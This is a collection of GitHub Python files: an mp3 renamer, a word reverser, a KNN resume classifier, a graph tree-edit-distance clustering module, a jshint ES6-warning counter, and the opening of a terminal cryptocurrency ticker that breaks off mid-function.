\r\nallfiles = glob.glob('*.mp3')\r\ncount=0\r\nfor afile in allfiles:\r\n new_filename =str(count).zfill(3) + '.mp3'\r\n print (new_filename)\r\n os.rename(afile, new_filename)\r\n count += 1\r\nprint(\"Done\")","repo_name":"dear983604/music2","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36456637963","text":"sentence=\"Hi how are you\"\ninlist=sentence.split(\" \")\n#print(inlist)\noutlist=[]\n\nfor word in inlist:\n tmp=''\n for letter in reversed(word):\n #print(letter)\n tmp=tmp+letter\n outlist.append(tmp)\n\nprint(\" \".join(outlist))\n","repo_name":"abhihimself/pythonic_algos","sub_path":"implementation/rev_every_word_sentence.py","file_name":"rev_every_word_sentence.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5144951824","text":"import joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport re\nimport seaborn as sns\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom scipy.sparse import csr_matrix, hstack\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import 
train_test_split, GridSearchCV\nfrom sklearn.neighbors import KNeighborsClassifier, NeighborhoodComponentsAnalysis\nfrom sklearn.preprocessing import LabelEncoder\n\n# file_path = '~/Projects/hau/csstudy/resume-screening-and-classification/knn-trial/datasets/dataset_hr_edited.csv'\nfile_path = '~/Projects/hau/csstudy/resume-screening-and-classification/knn-trial/datasets/Labeled_LiveCareer_Resumes_1076.xlsx'\n\nresumeDataSet = pd.read_excel(file_path)\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\n\nprint(resumeDataSet['Actual Category'].value_counts())\n\ndef cleanResume(resumeText):\n resumeText = re.sub('http\\S+\\s*', ' ', resumeText) # remove URLs\n resumeText = re.sub('RT|cc', ' ', resumeText) # remove RT and cc\n resumeText = re.sub('#\\S+', '', resumeText) # remove hashtags\n resumeText = re.sub('@\\S+', ' ', resumeText) # remove mentions\n resumeText = re.sub('[%s]' % re.escape(\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"), ' ', resumeText) # remove punctuations\n resumeText = re.sub(r'[^\\x00-\\x7f]',r' ', resumeText) \n resumeText = re.sub('\\s+', ' ', resumeText) # remove extra whitespace\n\n words = resumeText.split()\n words = [word for word in words if word.lower() not in stop_words]\n words = [stemmer.stem(word.lower()) for word in words if word.lower() not in stop_words]\n resumeText = ' '.join(words)\n return resumeText\n\nresumeDataSet['cleaned_resume'] = resumeDataSet.Resume.apply(lambda x: cleanResume(x))\n\nle = LabelEncoder()\nresumeDataSet['Actual Category'] = le.fit_transform(resumeDataSet['Actual Category'])\nle_filename = f'label_encoder.joblib'\njoblib.dump(le, le_filename)\n\nrequiredText = resumeDataSet['cleaned_resume'].values\nrequiredTarget = resumeDataSet['Actual Category'].values\n\nword_vectorizer = TfidfVectorizer(\n stop_words='english',\n sublinear_tf=True,\n max_features=18038\n)\n\nword_vectorizer.fit(requiredText)\njoblib.dump(word_vectorizer, 'tfidf_vectorizer.joblib')\nWordFeatures = word_vectorizer.transform(requiredText)\n\n# WordFeatures = WordFeatures.toarray()\nnca = NeighborhoodComponentsAnalysis(n_components=300, random_state=42)\nWordFeatures = nca.fit_transform(WordFeatures.toarray(), requiredTarget)\nnca_filename = f'nca_model.joblib'\njoblib.dump(nca, nca_filename)\n\nX_train,X_test,y_train,y_test = train_test_split(WordFeatures,requiredTarget,random_state=42, test_size=0.2,shuffle=True, stratify=requiredTarget)\nprint(X_train.shape)\nprint(X_test.shape)\n\n# n_neighbors_values = [\n# 1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 49, 51, \n# 53, 55, 57, 59, 61, 63, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99]\n# weights = [\"uniform\", \"distance\"]\n# metric = [\"euclidean\", \"manhattan\", \"minkowski\", \"cosine\"] \n# algorithm = ['ball_tree', 'kd_tree', 'brute']\n\n# Shorlisted Parameter Values\n# n_neighbors_values = [1]\n# weights = [\"uniform\", \"distance\"]\n# metric = [\"manhattan\"]\n# algorithm = ['ball_tree', 'kd_tree', 'brute']\n\n# param_grid = dict(n_neighbors=n_neighbors_values, weights=weights, metric=metric, algorithm=algorithm)\n# knn = KNeighborsClassifier()\n# gs = GridSearchCV(estimator=knn, param_grid=param_grid, scoring=\"accuracy\", verbose=1, cv=10, n_jobs=3)\n# grid_search = gs.fit(X_train, y_train)\n# results_df = pd.DataFrame(grid_search.cv_results_)\n# results_df.to_excel('grid_search_results_with_nca_300_and_top_hyperparameters.xlsx', index=False)\n# # 
results_df.to_excel('grid_search_results_with_nca_500.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_with_nca_400.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_with_nca_300.xlsx', index=False)\n# # results_df.to_excel('grid_search_results_no_nca.xlsx', index=False)\n# best_score = grid_search.best_score_\n# best_parameters = grid_search.best_params_\n# print(\"Best Score:\", best_score)\n# print(\"Best Parameters:\", best_parameters)\n\nknn = KNeighborsClassifier(n_neighbors=1, \n                           metric='manhattan',\n                           weights='uniform',\n                           # algorithm='ball_tree',\n                           # algorithm='kd_tree',\n                           algorithm='brute',\n                           )\nknn.fit(X_train, y_train)\n\nknnModel_filename = f'knn_model.joblib'\njoblib.dump(knn, knnModel_filename)\n\n# prediction = knn.predict(X_test)\n# print('Accuracy of KNeighbors Classifier on training set: {:.2f}'.format(knn.score(X_train, y_train)))\n# print('Accuracy of KNeighbors Classifier on test set: {:.2f}'.format(knn.score(X_test, y_test)))\n# print(\"\\n Classification report for classifier %s:\\n%s\\n\" % (knn, metrics.classification_report(y_test, prediction)))\n#\n# confusion_matrix = metrics.confusion_matrix(y_test, prediction)\n#\n# plt.figure(figsize=(10, 10))\n# sns.heatmap(confusion_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=le.classes_, yticklabels=le.classes_)\n# plt.xlabel('Predicted')\n# plt.ylabel('True')\n# plt.title('Confusion Matrix')\n# plt.show()\n#\n# print(X_test)\n# print(y_test)\n","repo_name":"chelscelis/resume-screening-and-classification","sub_path":"knn-trial/knn8.py","file_name":"knn8.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"34767998534","text":"import random\n\nimport networkx as nx\nimport numpy as np\nimport sklearn.cluster\nimport zss\n\nimport qf.graphs\n\n\ndef all_paths(G, target, maxLen):\n    \"\"\"\n    Returns an iterator for all paths in G of length <=maxLen with given target. Any such path will be returned\n    as a list [x_1,k_1,...,x_n,k_n,x_{n+1}] where x_{n+1}=target, 0<=n<=maxLen, (x_i,x_{i+1}) is\n    an arc with key k_i (for all i=1,...,n).\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        target: a node of G.\n        maxLen (int): the maximum length of the paths returned.\n\n    Returns:\n        an iterator that returns lists; each returned list will be a non-empty sequence alternating nodes and arcs of G\n        (starting and ending with a node, the last node will always be target) and containing no more than maxLen arcs.\n        Every arc will have source equal to the node immediately preceding it, and target equal to the node immediately\n        following it. All such lists will be returned, and none of them will be returned more than once. \n\n    \"\"\"\n    if maxLen > 0:\n        for s,t,d in G.in_edges(target, data=True):\n            for p in all_paths(G, s, maxLen - 1):\n                yield p + [d[\"label\"], target]\n    yield [target]\n\ndef in_tree(G, target, maxLen):\n    \"\"\"\n    Returns a (simple) multidigraph whose nodes are the paths as returned by all_paths(G, target, maxLen), \n    and with an arc from [x_1,k_1,...,x_n,k_n,x_{n+1}] to [x_2,k_2,...,x_n,k_n,x_{n+1}] for all n>0.\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        target: a node of G.\n        maxLen (int): the maximum length of the paths returned.\n\n    Returns:\n        see above. 
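Each node of the returned multidigraph is the string form str(p) of one such path. 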
The graph is the universal total graph of target truncated at depth maxLen.\n    \"\"\"\n    Gres = nx.MultiDiGraph()\n    if maxLen == 0:\n        Gres.add_node(str([target]))\n        return Gres\n    for p in all_paths(G, target, maxLen):\n        if len(p)>1 and not Gres.has_edge(str(p), str(p[2:])):\n            Gres.add_edge(str(p), str(p[2:]))\n    return Gres\n\n\ndef zss_all_paths(G, target, maxLen, nodeColoring=None):\n    \"\"\"\n    Same as all_paths, but it returns a zss.Node instead (the root of the tree). All nodes have the same label, unless\n    `nodeColoring` is specified (in which case the value of the map is used).\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        target: a node of G.\n        maxLen (int): the maximum length of the paths returned.\n        nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n    Returns:\n        a zss.Node that is the root of a tree isomorphic to the universal total graph of G at target, truncated at\n        maxLen.\n\n    \"\"\"\n    if nodeColoring is None:\n        node = zss.Node(\"x\")\n    else:\n        node = zss.Node(nodeColoring[target])\n    if maxLen == 0:\n        return node \n    res = node\n    for s,t,k in G.in_edges(target, keys=True):\n        res = res.addkid(zss_all_paths(G, s, maxLen - 1, nodeColoring))\n    return res\n\ndef zss_tree_dist_alt(G, x, y, maxLen, nodeColoring=None):\n    \"\"\"\n    Provides the zss.simple_distance between zss_all_paths(G,x,maxLen,nodeColoring) and zss_all_paths(G,y,maxLen,nodeColoring).\n    This function is very inefficient, please use `zss_tree_dist` instead.\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        x, y: nodes of G whose truncated trees are compared.\n        maxLen (int): the maximum length of the paths returned.\n        nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n    Returns: \n        the ZSS (edit) distance between the trees obtained truncating at depth maxLen the universal total graphs of x and y in G.\n    \"\"\"\n    return zss.simple_distance(zss_all_paths(G, x, maxLen, nodeColoring), zss_all_paths(G, y, maxLen, nodeColoring))\n    \ndef cached_zss_dist_matrix_alt(G, t, nodeColoring=None):\n    \"\"\"\n    Given a graph G and a value t, it computes all the zss_all_paths(G,x,t) trees (for all nodes x of G) and \n    computes all-pairs matrix. The matrix is returned as an np.ndarray, along with the list of nodes (in the order \n    of indices in the matrix) and a map from nodes to indices.\n    This function is very inefficient, please use `cached_zss_dist_matrix` instead.\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        t (int): the truncation depth.\n        nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n    Returns:\n        a tuple (M, nodes, indices), where\n        - M is a `numpy.ndarray` of shape (n,n) (where n is the number of nodes)\n        - nodes is a list containing all nodes (exactly once)\n        - indices is a dict from nodes to indices.\n        The entry M[i,j] is the ZSS (tree edit) distance\n        between the truncated universal trees at `node[i]` and `node[j]`. 
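Computing M requires n*(n-1)/2 pairwise tree edit distance evaluations, so expect this to be slow on large graphs.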
\n    \"\"\"\n    nodes = list(G.nodes)\n    n = len(nodes)\n    d = {}\n    indices = {}\n    for i in range(n):\n        d[nodes[i]] = zss_all_paths(G, nodes[i], t, nodeColoring)\n        indices[nodes[i]] = i\n    M = np.ndarray((n, n))\n    for i in range(n):\n        for j in range(i + 1, n):\n            M[i,j] = zss.simple_distance(d[nodes[i]], d[nodes[j]])\n    for i in range(n):\n        for j in range(i + 1):\n            if i == j:\n                M[i,j] = 0 \n            else:\n                M[i,j] = M[j,i]\n    return (M, nodes, indices)\n\ndef cached_zss_dist_matrix(G, t, nodeColoring=None, order_label=None):\n    \"\"\"\n    Given a graph G and a value t, it computes all the zss_all_paths(G,x,t) trees (for all nodes x of G) and \n    computes all-pairs matrix. The matrix is returned as an np.ndarray, along with the list of nodes (in the order \n    of indices in the matrix) and a map from nodes to indices.\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        t (int): the truncation depth.\n        nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n        order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n            to sort children in trees.\n\n    Returns:\n        a tuple (M, nodes, indices), where\n        - M is a `numpy.ndarray` of shape (n,n) (where n is the number of nodes)\n        - nodes is a list containing all nodes (exactly once)\n        - indices is a dict from nodes to indices.\n        The entry M[i,j] is the ZSS (tree edit) distance\n        between the truncated universal trees at `node[i]` and `node[j]`. 
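A typical call (illustrative sketch only; G, u and v are assumed to be a small `networkx.MultiDiGraph` and two of its nodes):\n\n        M, nodes, indices = cached_zss_dist_matrix(G, 3)\n        dist_uv = M[indices[u], indices[v]]  # tree edit distance between the depth-3 views of u and v\n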
It also returns the distance matrix used (which is M or\n the one obtained computing all zss distances for trees of height t), the \n list of nodes (in the order of indices in the matrix) and a map from nodes to indices.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n num_clusters (int): the number of clusters to be produced.\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n a tuple (clustering, M, nodes, indices):\n - clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n - M the matrix used for clustering\n - nodes the list of nodes used to index M\n - indices the dictionary from nodes to indices.\n \"\"\"\n if M is None:\n M, nodes, indices = cached_zss_dist_matrix(G, t, nodeColoring, order_label)\n clustering = sklearn.cluster.AgglomerativeClustering(\n affinity=\"precomputed\", linkage=linkage_type, \n n_clusters=num_clusters, compute_distances=True)\n clustering.fit(M)\n return (clustering, M, nodes, indices)\n\n\ndef agclust_varcl(G, t, minCl, maxCl, M=None, nodes=None, indices=None, nodeColoring=None, linkage_type=\"single\", order_label=None):\n \"\"\"\n Given a graph G, it computes a clustering (calling `agclust`)\n clustering with a number of clusters varying from minCl (inclusive) to maxCl (exclusive).\n For every clustering the resulting silhouette score is computed (`sklearn.metrics.silhouette_score`).\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n minCl (int): the minimum number of clusters to be produced (inclusive).\n maxCl (int): the maximum number of clusters to be produced (exclusive).\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n The result returned is the same as in `agclust`, but the first component is a dictionary with \n keys the number of clusters and values are a pair made by the the corresponding clustering and the silhouette score. 
Note \n that if for some specific number of clusters the clustering procedure raises an exception, we just avoid\n adding the corresponding result to the dictionary.\n \"\"\"\n if M is None:\n M, nodes, indices = cached_zss_dist_matrix(G, t, nodeColoring, order_label)\n res = {}\n for cl in range(minCl, maxCl):\n try:\n clustering = sklearn.cluster.AgglomerativeClustering(\n affinity=\"precomputed\", linkage=linkage_type, \n n_clusters=cl, compute_distances=True)\n clustering.fit(M)\n silhouette = sklearn.metrics.silhouette_score(M, clustering.labels_, metric=\"precomputed\")\n res[cl]=(clustering, silhouette)\n except Exception as exc:\n print(type(exc))\n print(exc.args)\n print(exc)\n pass\n return (res, M, nodes, indices)\n\ndef agclust_optcl(G, t, minCl, maxCl, M=None, nodes=None, indices=None, nodeColoring=None, linkage_type=\"average\", order_label=None):\n \"\"\"\n Given a graph G, it computes a clustering (calling `agclust`)\n clustering with a number of clusters varying from minCl (inclusive) to maxCl (exclusive).\n For every clustering the resulting silhouette score is computed (`sklearn.metrics.silhouette_score`),\n and the first clustering producing the maximal silhouette is returned (in the same form as in\n `agclust`.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n minCl (int): the minimum number of clusters to be produced (inclusive).\n maxCl (int): the maximum number of clusters to be produced (exclusive).\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n a tuple (clustering, M, nodes, indices):\n - clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n - M the matrix used for clustering\n - nodes the list of nodes used to index M\n - indices the dictionary from nodes to indices.\n \"\"\"\n res, M, nodes, indices = agclust_varcl(G, t, minCl, maxCl, M, nodes, indices, nodeColoring, linkage_type, order_label)\n maxsilhouette=max([v[1] for v in res.values()])\n for optCl in res.keys():\n if res[optCl][1]==maxsilhouette:\n break\n return (res[optCl][0], M, nodes, indices)\n\ndef agclust2dict(clustering, M, nodes, indices):\n \"\"\"\n Given the results of agclust, produces a labelling for the nodes of G (a map from nodes to clusters).\n\n Args:\n clustering: a clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n M (`numpy.ndarray`): the distance matrix used to compute the clustering (ignored by this function).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n\n Returns:\n a dictionary whose keys are nodes, and where two keys are associated the same value iff they belong to the same cluster.\n \"\"\"\n return {x: clustering.labels_[indices[x]] for x in nodes}\n \n \nclass SpecialNode(object):\n \"\"\"\n An 
alternative implementation of a zss.Node that does not need to actually unfold the paths.\n    \"\"\"\n\n    def __init__(self, G, x, depth, nodeColoring, order_label):\n        \"\"\"\n        Creates a node of a truncated universal total graph.\n\n        Args:\n            G: the graph (a `networkx.MultiDiGraph`)\n            x: the node (the root of the universal total graph)\n            depth (int): the depth of the view.\n            nodeColoring (dict): if not None, it is a map with nodes as keys; the values are used to color the tree.\n            order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n                to sort children in trees.\n        \"\"\"\n        self.G = G\n        self.x = x\n        self.depth = depth\n        if nodeColoring is None:\n            self.label = \"x\"\n        else:\n            self.label = nodeColoring[x]\n        self.children = []\n        if depth > 0:\n            chl = []\n            for s, t, d in G.in_edges(x, data=True):\n                chl.append(s)\n            if order_label is not None:\n                d = nx.get_node_attributes(G, order_label)\n                chl = sorted(chl, key=lambda node: d[node])\n            for child in chl:\n                self.children.append(SpecialNode(G, child, depth - 1, nodeColoring, order_label))\n\n    @staticmethod\n    def get_children(node):\n        return node.children\n\n    @staticmethod\n    def get_label(node):\n        return node.label\n\n    def recprint(self, level):\n        for i in range(level):\n            print(\"\\t\", end=\"\")\n        print(self.x)\n        for c in self.children:\n            c.recprint(level + 1)\n\ndef zss_tree_dist(G, x, y, maxLen, nodeColoring=None):\n    \"\"\"\n    Provides the zss.simple_distance between zss_all_paths(G,x,maxLen,nodeColoring) and zss_all_paths(G,y,maxLen,nodeColoring).\n\n    Args:\n        G: a `networkx.MultiDiGraph`.\n        x: a node of G.\n        y: a node of G.\n        maxLen (int): the maximum length of the paths returned.\n        nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n    Returns:\n        the ZSS (edit) distance between the trees obtained truncating at depth maxLen the universal total graphs of x and y in G.\n    \"\"\"\n    return zss.simple_distance(SpecialNode(G, x, maxLen, nodeColoring, None), SpecialNode(G, y, maxLen, nodeColoring, None))\n\ndef katz_preorder(G, order_label):\n    \"\"\"\n    Computes Katz centrality on (the simple version of) G, and adds its value as a node attribute with the given label.\n\n    Args:\n        G: the graph involved.\n        order_label: the label to be used for the new node attribute.\n    \"\"\"\n    nx.set_node_attributes(G, nx.katz_centrality(qf.graphs.to_simple(G)), order_label)\n","repo_name":"boldip/qf","sub_path":"src/qf/qzss.py","file_name":"qzss.py","file_ext":"py","file_size_in_byte":17986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"12847384908","text":"import os\nimport sys\nimport subprocess\n\ndef runner(filepath,arr):\n    if os.path.isdir(filepath):\n        for root, subFolders, files in os.walk(filepath):\n            for file in files:\n                if(file.endswith(\".js\")):\n                    f = os.path.join(root, file)\n                    runjshint(f,arr)\n    elif os.path.isfile(filepath):\n        runjshint(filepath,arr)\n    print(arr)\n\ndef runjshint(f,arr):\n    bashCommand = \"jshint \"+f\n    process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n    output, error = process.communicate()\n    outarr = output.decode(\"utf-8\").split('\\n')\n    for item in outarr:\n        if \"ES6\" in item:\n            keyname = item.split(\", \")[-1]\n            if keyname in arr.keys():\n                arr[keyname]+=1\n            else:\n                arr[keyname]=1\n    return arr\nif __name__ == \"__main__\":\n    arr = {}\n    
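# assumed CLI usage: python jshintRunner.py <js-file-or-directory>\n    # tallies, per ES6 feature, how many jshint warnings mention it\n    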
runner(sys.argv[1],arr)\n","repo_name":"MadhuNimmo/jsHintRunner","sub_path":"jshintRunner.py","file_name":"jshintRunner.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20577936555","text":"#!/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nUsage::\n\n tc-ticker [NUM] [PAIR ...]\n\n Show NUM volume leaders and/or named PAIRs, which can take any of the\n following (case-insensitive) forms:\n\n basequote, base_quote, base/quote, \"base quote\"\n\n For now, all options are env-var based and subject to change\n\nWarning\n-------\nWhether due to my own failings or those of the exchange, the market data\ndisplayed is often inaccurate and should be considered untrustworthy.\n\n\"\"\"\n# Author: Jane Soko\n# License: Apache 2.0\n\nimport asyncio\nimport os\nimport sys\nfrom decimal import Decimal as Dec\nfrom enum import Enum\n\nif __name__ == \"__main__\":\n sys.path.insert(0, os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\n\nfrom terminal_coin_ticker import ( # noqa E402\n add_async_sig_handlers, remove_async_sig_handlers, ppj, decimate\n)\nfrom terminal_coin_ticker.clients import hitbtc, binance # noqa E402\n\n# Env vars\nEXCHANGE = \"HitBTC\" # Or Binance (slim pickings, at the moment)\nVOL_SORTED = True # Sort all pairs by volume, AUTO_FILL'd or named\nVOL_UNIT = \"USD\" # BTC, ETH, etc., or null for base currencies\nHAS_24 = False # Override COLORTERM if outlawed in environment\nPULSE = \"normal\" # Flash style of \"normal,\" \"fast,\" or null (off)\nPULSE_OVER = 0.125 # Flash threshold as % change in last price\nHEADING = \"normal\" # Also \"hr_over,\" \"hr_under,\" \"full,\" and \"slim\"\nAUTO_CULL = True # Drop excess PAIRs, and warn instead of exiting\nAUTO_FILL = True # Absent NUM, add volume leaders till MAX_FILL\nMAX_FILL = 24 # Or null/non-int to use term height (absent NUM)\nSTRICT_TIME = True # Die when service notifications aren't updating\nVERBOSITY = 6 # Ignored without LOGFILE (device, file, etc.)\nUSE_AIOHTTP = False # Ignored unless ``websockets`` is also installed\n\n# TTL vars\nMAX_STALE = 0.5 # Tolerance threshold ratio of stale/all pairs\nSTALE_SECS = 15 # Max seconds pair data is considered valid\nPOLL_INTERVAL = 10 # Seconds to wait between checks\n\n\nclass Headings(Enum):\n slim = 1\n normal = hr_over = hr_under = 2\n full = 3\n\n\ndef _convert_volume(client, sym, base, quote, tickdict):\n \"\"\"\n Return volume in target units. Assumptions:\n 1. ``target`` exists in ``client.markets``\n 2. ``sym`` is canonical (in correct format and confirmed available)\n 3. 
``tickdict`` has been decimated (digit strings to Decimal instances)\n \"\"\"\n # XXX this might be better suited as a decorator that returns a\n # converter already primed with all the exchange particulars.\n target = VOL_UNIT\n #\n # At least for HitBTC, Symbol records have a \"quoteCurrency\" entry\n # that's always \"USD\", but some symbols end in \"USDT\"\n if sym.endswith(target) or (target == \"USD\" and sym.endswith(\"USDT\")):\n return tickdict[\"volQ\"]\n #\n assert client.conversions is not None\n if quote + target in client.conversions:\n rate = Dec(client.ticker[quote + target][\"last\"])\n else:\n rate = 1 / Dec(client.ticker[target + quote][\"last\"])\n return Dec(client.ticker[sym][\"volQ\"]) * rate\n\n\ndef _print_heading(client, colors, widths, numrows, volstr):\n from subprocess import check_output\n try:\n sitm = check_output([\"tput\", \"sitm\"]).decode()\n ritm = check_output([\"tput\", \"ritm\"]).decode()\n except FileNotFoundError:\n sitm = ritm = \"\"\n else:\n if not ritm:\n sitm = \"\"\n #\n bg, fg = colors\n #\n align_chars = (\"<\", \">\" if VOL_UNIT else \"<\", \"<\", \"<\", \">\", \"\")\n if HEADING not in (\"normal\", \"slim\"):\n align_chars = (\"\", \"<\") + align_chars\n #\n _w = widths[2:] if HEADING in (\"normal\", \"slim\") else widths\n head_fmt = \"\".join(\"{:%s%d}\" % (a, w) for a, w in zip(align_chars, _w))\n #\n nl = \"\\x1b[m\\n\"\n # heading background\n head_bg = bg.dark\n # heading foreground\n head_fg = fg.head_alt if HAS_24 else fg.dim\n # board\n board = (\n *(bg.dark if HAS_24 else bg.tint, \" \" * sum(widths),\n \"\\x1b[m\\n\") * (numrows - 1),\n bg.dark if HAS_24 else bg.tint, \" \" * sum(widths), \"\\x1b[m\\x1b[K\"\n )\n if HEADING == \"normal\":\n print(head_bg, \" \" * widths[0], # heading background, left margin\n # exchange\n fg.dark, sitm,\n \"{:<{w}}\".format(client.exchange, w=widths[1]), ritm,\n # heading\n head_fg, head_fmt.format(\"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # hr\n head_bg, fg.dark, \"\\x1b[4m\", \"─\" * sum(widths), nl,\n # board\n *board, sep=\"\", end=\"\")\n elif \"hr_\" in HEADING:\n ex_hr = (head_bg, sitm, fg.faint_shade if HAS_24 else fg.dark,\n \"─\" * widths[0], client.exchange,\n \"─\" * (sum(widths) - len(client.exchange) - widths[0]), nl)\n heading = (head_bg, head_fg,\n head_fmt.format(\"\", \"\", \"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl)\n if HEADING == \"hr_over\":\n print(*ex_hr, *heading, *board, sep=\"\", end=\"\")\n else:\n print(*heading, *ex_hr, *board, sep=\"\", end=\"\")\n elif HEADING == \"full\":\n print( # exchange\n head_bg, sitm, fg.faint_shade if HAS_24 else fg.dark,\n \"─\" * (sum(widths) - len(client.exchange) - widths[-1]),\n client.exchange, \"─\" * widths[-1], ritm, nl,\n # heading\n head_bg, head_fg,\n head_fmt.format(\"\", \"Pair\", \"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # hr\n head_bg, fg.faint_shade if HAS_24 else fg.dark,\n \"\\x1b[4m\", \"─\" * sum(widths), nl,\n # board\n *board, sep=\"\", end=\"\")\n elif HEADING == \"slim\":\n print(head_bg, \" \" * widths[0], # heading background, left margin\n # exchange\n fg.dark, sitm, \"{:<{w}}\".format(client.exchange, w=widths[1]),\n ritm if HAS_24 else \"\",\n # heading\n head_fg, head_fmt.format(\"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # board\n *board, sep=\"\", end=\"\")\n\n\nasync def _check_timestamps(all_subs, client, kill_handler, strict=True,\n max_stale=MAX_STALE, stale_secs=STALE_SECS,\n poll_interval=POLL_INTERVAL):\n \"\"\"\n 
Iterate over latest ticker entries and check timestamps against ttl\n threshold. Like ``_paint_ticker_line()``, it doesn't make sense to\n return a value for this function because it can only die if its\n outer future is cancelled.\n\n Sending ``SIGINT`` to pid 0 raises ``BlockingIOError`` (errno 11).\n Raising a ``KeyboardInterrupt`` works, but the teardown handlers\n registered for ``SIGINT`` won't run.\n\n Note: The API docs imply that ``channel`` notifications are only\n pushed when a change in price has occurred. Simply juxtaposing the\n website's ticker with this one pretty much debunks this. Never mind\n that for many notification updates, only the timestamps have\n changed. For now, assume push consistency is governed by network\n load and other operating factors. Other APIs present\n heartbeat-related options that probably require an actual\n understanding of websockets standards/conventions.\n \"\"\"\n from itertools import cycle\n from datetime import datetime\n while not client.ticker_subscriptions:\n await asyncio.sleep(poll_interval)\n stale_subs = set()\n for sym in cycle(all_subs):\n ts_str = client.ticker[sym][\"time\"]\n if ts_str is None:\n continue\n diff = (datetime.utcnow() - client.make_date(ts_str)).seconds\n if diff > stale_secs:\n if LOGFILE:\n # Using ``*.call_soon`` doesn't seem to make a difference here\n client.echo(\"Stale timestamp for %r. Off by %d min %d secs\" %\n (sym, *divmod(diff, 60)), 5)\n stale_subs.add(sym)\n if strict and len(stale_subs) / len(all_subs) > max_stale:\n kill_handler(error=\"The number of pairs awaiting updates has \"\n \"exceeded the maximum allowed\",\n msg=\"Killed by _check_timestamps\")\n break\n else:\n client.ticker[sym][\"time\"] = None # <- mark as stale\n else:\n stale_subs.discard(sym)\n try:\n await asyncio.sleep(poll_interval)\n except asyncio.CancelledError:\n break\n client.echo(\"Exiting\", 6)\n return \"_check_timestamps cancelled\"\n\n\nasync def _paint_ticker_line(client, lnum, sym, semaphore, snapshots, fmt,\n colors, bq_pair, wait=1.0, pulse_over=PULSE_OVER):\n \"\"\"\n The kwargs are tweakable and should perhaps be presented as global\n options. ``wait`` is the update period. ``pulse_over`` is the\n red/green flash threshold.\n \"\"\"\n 